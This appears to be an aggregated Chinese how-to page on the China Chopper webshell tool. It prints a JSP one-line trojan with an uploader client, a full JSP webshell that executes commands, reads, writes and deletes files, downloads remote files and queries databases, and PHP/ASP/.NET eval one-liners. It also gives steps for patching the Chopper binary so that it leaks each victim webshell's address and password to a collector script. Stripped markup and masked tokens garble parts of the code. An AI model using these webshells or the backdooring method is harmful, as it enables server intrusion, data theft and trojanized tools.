本文目录一览:
- 1、如何使用 *** P一句话木马和菜刀木马
- 2、中国菜刀的功能介绍:
- 3、为什么我的中国菜刀链接我自己的服务器,无法执行cmd显示执行命令失败,对方启动安全模式
- 4、如何给中国菜刀添加隐蔽后门
- 5、黑客菜刀是什么意思
如何使用 *** P一句话木马和菜刀木马
相信用过一句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。也许一场血雨腥风的Struts2漏洞利用潮即将来临。
说了这么多废话,本文的目的是什么呢?其实只是想记录一下 *** P几种后门代码啦,因为曾经找 *** P菜刀马找的老辛苦了。
1、首先是 *** P一句话木马和它的客户端小伙伴。(小伙伴们都惊呆了~~~)
以下是服务端,保存成one.jsp并上传至目标服务器中。
%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%
通过使用一句话木马客户端连接one.jsp木马。
将下列代码保存为html页面:
htmlheadtitle *** P一句话木马客户端/title/headdiv align=center font color=red专用 *** P木马连接器/fontbrform name=get method=post服务端地址input name=url size=110 type=text brbrtextarea name=t rows=20 cols=120你提交的代码/textareabr保存成的文件名:input name=f size=30 value=shell.jspinput type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交 /form br服务端代码:brtextarea rows=5 cols=120%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());% /textarea /div/body
保存完成后,打开html页面,写入一句话木马服务端地址,例如,写入需要的代码和保存的文件名称点击保存即可。
2、中国菜刀能用的菜刀马
本文除了对jsp一句话木马进行了说明,还提供了一个中国菜刀能用的菜刀马。
将下列代码保存为xx.jsp并上传至目标服务器,使用中国菜刀工具进行连接。
%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%%!String Pwd="cto365.com";String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}Connection GC(String s)throws Exception{String[] x=s.trim().split("rn");Class.forName(x[0].trim()).newInstance();Connection c=DriverManager.getConnection(x[1].trim());if(x.length2){c.setCatalog(x[2].trim());}return c;}void AA(StringBuffer *** )throws Exception{File r[]=File.listRoots();for(int i=0;ir.length;i++){ *** .append(r[i].toString().substring(0,2));}}void BB(String s,StringBuffer *** )throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;il.length;i++){dt=new java.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){ *** .append(l[i].getName()+"/t"+sT+"t"+l[i].length()+"t"+sQ+"n");}else{sF+=l[i].getName()+"t"+sT+"t"+l[i].length()+"t"+sQ+"n";}} *** .append(sF);}void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0;kx.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write(("-"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"-").getBytes(),0,3);os.close();is.close();}void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0;id.length();i+=2){os.write((h.indexOf(d.charAt(i))4|h.indexOf(d.charAt(i+1))));}os.close();}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0;jz.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}void MM(InputStream is, StringBuffer *** )throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){ *** .append(l+"rn");}}void NN(String s,StringBuffer *** )throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();while(r.next()){ *** .append(r.getString(1)+"t");}r.close();c.close();}void OO(String s,StringBuffer *** )throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);while(r.next()){ *** .append(r.getString("TABLE_NAME")+"t");}r.close();c.close();}void PP(String s,StringBuffer *** )throws Exception{String[] x=s.trim().split("rn");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();for(int i=1;i=d.getColumnCount();i++){ *** .append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")t");}r.close();m.close();c.close();}void *** (String cs,String s,String q,StringBuffer *** )throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i=n;i++){ *** .append(d.getColumnName(i)+"t|t");} *** .append("rn");while(r.next()){for(i=1;i=n;i++){ *** .append(EC(r.getString(i),cs)+"t|t");} *** .append("rn");}r.close();}catch(Exception e){ *** .append("Resultt|trn");try{m.executeUpdate(q); *** .append("Execute Successfully!t|trn");}catch(Exception ee){ *** .append(ee.toString()+"t|trn");}}m.close();c.close();}%%String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);StringBuffer *** =new StringBuffer("");try{ *** .append("-"+"|");if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent(); *** .append(s+"t");if(!s.substring(0,1).equals("/")){AA( *** );}}else if(Z.equals("B")){BB(z1, *** );}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){ *** .append(l+"rn");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close(); *** .append("1");}else if(Z.equals("E")){EE(z1); *** .append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2); *** .append("1");}else if(Z.equals("H")){HH(z1,z2); *** .append("1");}else if(Z.equals("I")){II(z1,z2); *** .append("1");}else if(Z.equals("J")){JJ(z1); *** .append("1");}else if(Z.equals("K")){KK(z1,z2); *** .append("1");}else if(Z.equals("L")){LL(z1,z2); *** .append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(), *** );MM(p.getErrorStream(), *** );}else if(Z.equals("N")){NN(z1, *** );}else if(Z.equals("O")){OO(z1, *** );}else if(Z.equals("P")){PP(z1, *** );}else if(Z.equals("Q")){ *** (cs,z1,z2, *** );}}catch(Exception e){ *** .append("ERROR"+":// "+e.toString());} *** .append("|"+"-");out.print( *** .toString());%
中国菜刀的功能介绍:
只要支持动态脚本的网站,都可以用中国菜刀来进行管理!主要功能有:文件管理,虚拟终端,数据库管理。
UINCODE方式编译,支持多国语言输入显示。
一、EVAL客户端部分
1)要了解的
服务端只需要简单的一行代码,即可用此程序实现常用的管理功能。
支持的服务端脚本:PHP, ASP,NET。
在服务端运行的代码如下:
PHP: ?php @eval($_POST['pass']);?
ASP: %eval request(pass)%
.NET: %@ Page Language=Jscript%%eval(Request.Item[pass],unsafe);%
(注意: .NET要单独一个文件或此文件也是Jscript语言)
2)怎么用
在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,保存后即可使用文件管理,虚拟终端,数据库管理三大块功能。要是其它都没错误,那么可能就是你把语言编码选错了。
1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;
2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)
3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS
以入支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接 *** 请点击数据库管理界面左上角处的配置按钮查看)
注意:由于服务器的安全设置,某些功能可能不能正常使用。
3) 关于配置信息怎么填?
A) 数据库方面:
PHP脚本:
T类型/T 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种
H主机地址H 主机地址可为机器名或IP地址,如localhost
U数据库用户/U 连接数据库的用户名,如root
P数据库密码/P 连接数据库的密码,如123455
ASP和.NET脚本:
T类型/T 类型只能填ADO
CADO配置信息/C
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456
B) 其它方面:
添加额外附加提交的数据:应付这种情况:if ($_POST['action']=='test'){@eval($_POST['pass']);}
Oaction=test/O
提交功能前先POST额外的数据包:会话期间只提交一次。
DATAuid=user1pwd=123456/DATA
二、网站蜘蛛
织出一张网站的目录结构。
下载的列表文件存在桌面,右键菜单/载入URL列表即可以根据地址得到目录结构。
三、定时提醒
当闹钟事使吧, 周期:每月/每周/每日/只一次。
四、快速启动
一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是以加密存储的。
五、浏览器
地址栏输入HELP,更多精彩后续加入。
六、其它部分
等待加入。
附带工具
update.exe是wsc.exe的数据库wscdb迁移到菜刀的一个小工具。
把wscdb文件整到当前目录,运行update.exe得到新的数据库文件caidao.mdb
把菜刀的数据库db.mdb替换掉即可。
为什么我的中国菜刀链接我自己的服务器,无法执行cmd显示执行命令失败,对方启动安全模式
您好,电脑基础专业芝麻团队奶沫为您解答!(望采纳,谢谢)
中国菜刀是黑客用的吧?
如何给中国菜刀添加隐蔽后门
1、后门如何触发
这里要先讲下菜刀的后门是如何触发的,知道如何触发后门,后面按这个思路往下看会方便些。
当一句话连回目标服务器时,我们经常会在文件列表中右键查看文件,如下图
当我们执行右键-编辑文件时,我们的后门就会被触发(我们要添加的就是这样的一个隐藏后门)。
2、菜刀脱壳
在分析菜刀前,先把菜刀的壳脱掉,使用Peid可知,菜刀是UPx壳,网上找个Upx的脱壳工具即可脱壳。
3、查看数据包,分析流程(右键-编辑)
本地搭建好环境后,在菜刀中右键-编辑查看某一文件,使用burpsuite进行抓包,
数据如下
a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3Bz0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3Dz1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D
一共有3个参数,
a url解码后为@eval (base64_decode($_POST[z0]));
z0先url解码,在base64解码为
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|-");die();
Z1先url解码,在base64解码为
C:\\wamp\\www\\robots.txt
稍微熟悉php的人应该能看出来,这段代码就是一个读文件的php脚本,由菜刀发送到目标服务器上,然后在目标服务器上执行的。 既然代码作为字符串发送带目标服务器上,那我我们可以再字符串上添加我们想执行的代码,由菜刀一起发送过去执行。
if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}
如果我们将上这段代码作为字符串,发送到服务端执行,我们就能获得webshell的地址和密码。
4、使用OD分析
使用OD打开中国菜刀,右键搜索字符串,结果如下:
定位到php读取文的字符串处,点击进去到代码处
可知,程序时将其作为字符串,压入栈中作为参数被后续函数处理的,如果在这段字符串后加入我们的后门代码,就会被程序一块发送到服务端执行。
5、修改菜刀程序文件
由上可知,字符串的地址为0x49ba94,查看内存数据,
发现其后面已经被他字符串占用(直接查看原二进制文件结果也是如此),如果我们强制在后面添加后门字符串,就会破坏远程的某些内容。因此我们需要另外找一个空闲的大空间,将后门代码放在此处。
这里我们选取地址4841d0h的空间,转化为文件偏移即为841d0h。
将后门字符串
$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}
放到文件841d0处
打开010editor 将上述字符串复制到010editor中,
由于程序中的字符串是双字节存放的,这里我们需要将后门代码也转化为双字节的。010ditor-工具-转换
使用010editor打开菜刀程序,跳到841d0h偏移处,将转换后的字符串覆盖替换菜刀程序中相同大小的数据长度,
保存文件,这样后门字符串就被我们添加到程序中了。
6、使用OD修改程序代码
用OD打开菜刀程序,定位到第4步中字符串入栈的代码处 push 0049bae4。
0049bae4地址是修改前字符串的位置,现在我们将其改成我们添加的字符串的地质处,字符串文件偏移为841d0h,转化内存偏移为4841d0h,代码修改如下
保存修改的文件即可。
7、测试修改结果
修改文件后,我们在看看菜刀-右键编辑,抓到数据包
Z0解密后为
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents(''.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));};echo("|-");die();
可见我们的后门代码也一起被发送到服务端执行了。
编写加单的getx.php接收结果,
getx.php:
?php
$getx = $_GET["caidao"];
$file = fopen("getx.txt","a+");
fwrite($file,$getx);
fwrite($file,"\r\n");
fclose($file);
?
结果如下:
8、后记
通过测试可知,对于asp,aspx跟php后门的添加相似,都可以实现。Jsp木马形式不一,实现添加后门较为困难。另外,由于后门是在服务端执行的,所以不容易被发现,本地抓包是检测不到后门的;OD中右键查看后门地址也是不能直接看到的。
黑客菜刀是什么意思
从软件名字上来讲有这个软件属于黑客工具,用于管理拿下的webshell批量管理。
如果是菜刀的话可以在社工的时候拿菜刀威胁恐吓对方也属于忽悠的一种,也是属于黑客
很高兴为逗逼解答。如果你满意的话麻烦采纳!